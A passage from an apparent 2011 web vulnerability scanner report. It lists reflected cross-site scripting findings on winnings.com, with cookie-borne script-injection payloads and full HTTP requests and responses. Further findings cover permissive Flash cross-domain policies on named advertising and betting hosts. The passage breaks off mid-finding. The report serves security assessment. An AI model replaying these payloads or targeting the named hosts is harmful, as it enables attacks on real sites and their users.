3.464. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /scratch-cards

Issue detail

The value of the winnings[sessionId] cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d265'><script>alert(1)</script>a88d2fe9109 was submitted in the winnings[sessionId] cookie. This input was echoed as 2d265\'><script>alert(1)</script>a88d2fe9109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=2d265'><script>alert(1)</script>a88d2fe9109; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:41:31 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:41:31 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:41:32 GMT
Connection: close
Content-Length: 24950

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
<iframe style='display:none' src='http://www.info.winnings.com/visit.aspx?csi=21&par=2d265\'><script>alert(1)</script>a88d2fe9109IP1x10&CurrencyCode=gbp

' border='0' height='1' width='1' bgcolor='#999999' frameborder='0'>
...[SNIP]...

3.465. http://www.winnings.com/scratch-cards [winnings[vid] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /scratch-cards

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a034"><script>alert(1)</script>2857d034cbb was submitted in the winnings[vid] cookie. This input was echoed as 2a034\"><script>alert(1)</script>2857d034cbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=5401292a034"><script>alert(1)</script>2857d034cbb; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:38:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:38:19 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:38:21 GMT
Connection: close
Content-Length: 24889

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
<a class="cssMenui" href="http://www.vincite.net/scratch-cards?vid=5401292a034\"><script>alert(1)</script>2857d034cbb">
...[SNIP]...

3.466. http://www.winnings.com/site-map [winnings[vid] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /site-map

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1ed9"><script>alert(1)</script>d1fc9b66264 was submitted in the winnings[vid] cookie. This input was echoed as e1ed9\"><script>alert(1)</script>d1fc9b66264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /site-map HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129e1ed9"><script>alert(1)</script>d1fc9b66264; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:40:02 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:40:02 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:40:03 GMT
Connection: close
Content-Length: 18757

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title> Site map..| Winnings.com</title>
<link rel="a
...[SNIP]...
<a class="cssMenui" href="http://www.vincite.net/site-map?vid=540129e1ed9\"><script>alert(1)</script>d1fc9b66264">
...[SNIP]...

3.467. http://www.winnings.com/slots [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /slots

Issue detail

The value of the winnings[sessionId] cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8b79d'><script>alert(1)</script>0b453c666d was submitted in the winnings[sessionId] cookie. This input was echoed as 8b79d\'><script>alert(1)</script>0b453c666d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=8b79d'><script>alert(1)</script>0b453c666d; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:41:17 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:41:17 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:41:20 GMT
Connection: close
Content-Length: 24817

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win
...[SNIP]...
<iframe style='display:none' src='http://www.info.winnings.com/visit.aspx?csi=21&par=8b79d\'><script>alert(1)</script>0b453c666dIP1x10&CurrencyCode=gbp

' border='0' height='1' width='1' bgcolor='#999999' frameborder='0'>
...[SNIP]...

3.468. http://www.winnings.com/slots [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /slots

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24733</script><script>alert(1)</script>c2b9a603bf9 was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=10312273324733</script><script>alert(1)</script>c2b9a603bf9; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:43:59 GMT
Connection: close
Content-Length: 24865

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win
...[SNIP]...
', ' + gid;gid = '&GID=' + gid;}window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21' + gid + prd + '&BO=FM&PAR=10312273324733</script><script>alert(1)</script>c2b9a603bf9' + ph + '1x10', winName, urlParms);var domain = document.domain;try {var myTracker=_gat._getTrackerByName();_gaq.push(['_trackEvent', 'Outgoing Links '+domain, 'flashclick ('+flashclickParams+')']);}
...[SNIP]...

3.469. http://www.winnings.com/slots [winnings[vid] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /slots

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f7f"><script>alert(1)</script>17019db4cca was submitted in the winnings[vid] cookie. This input was echoed as 88f7f\"><script>alert(1)</script>17019db4cca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=54012988f7f"><script>alert(1)</script>17019db4cca; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:38:57 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:38:57 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:39:00 GMT
Connection: close
Content-Length: 24759

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win
...[SNIP]...
<a class="cssMenui" href="http://www.vincite.net/slots?vid=54012988f7f\"><script>alert(1)</script>17019db4cca">
...[SNIP]...

4. Flash cross-domain policy
There are 144 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad-emea.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 16 May 2011 11:41:04 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.2. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 16 May 2011 12:49:31 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 12:49:29 GMT
Date: Mon, 16 May 2011 12:49:29 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.4. http://bingo.bet365.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bingo.bet365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bingo.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:6dc0"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:36 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.5. https://bingo.betsson.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://bingo.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bingo.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 08:32:00 GMT
Last-Modified: Wed, 12 Jan 2011 16:05:16 GMT
Accept-Ranges: bytes
ETag: "1CBB27280604600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:52 GMT
Connection: close
Content-Length: 378

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="192.168.104.199"/>
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="*"/>
...[SNIP]...

4.6. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Mon, 16 May 2011 12:52:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.7. http://casino.bet365.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: casino.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:7066"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:32 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://d.tradex.openx.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "60fa3-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.9. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.10. http://games.bet365.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.bet365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: games.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:6dc0"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:02:24 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.11. http://getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:21 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
ETag: "958b98-c9-433f845a21a00"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.12. http://in.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:35 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT
ETag: "5d8140-c9-4963cf9438ac0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.13. https://in.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:18 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 03:42:11 GMT
ETag: "5d8140-c9-4963cf9438ac0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.14. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Type: text/xml
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 212

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

4.15. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:53:27 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.16. http://m.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

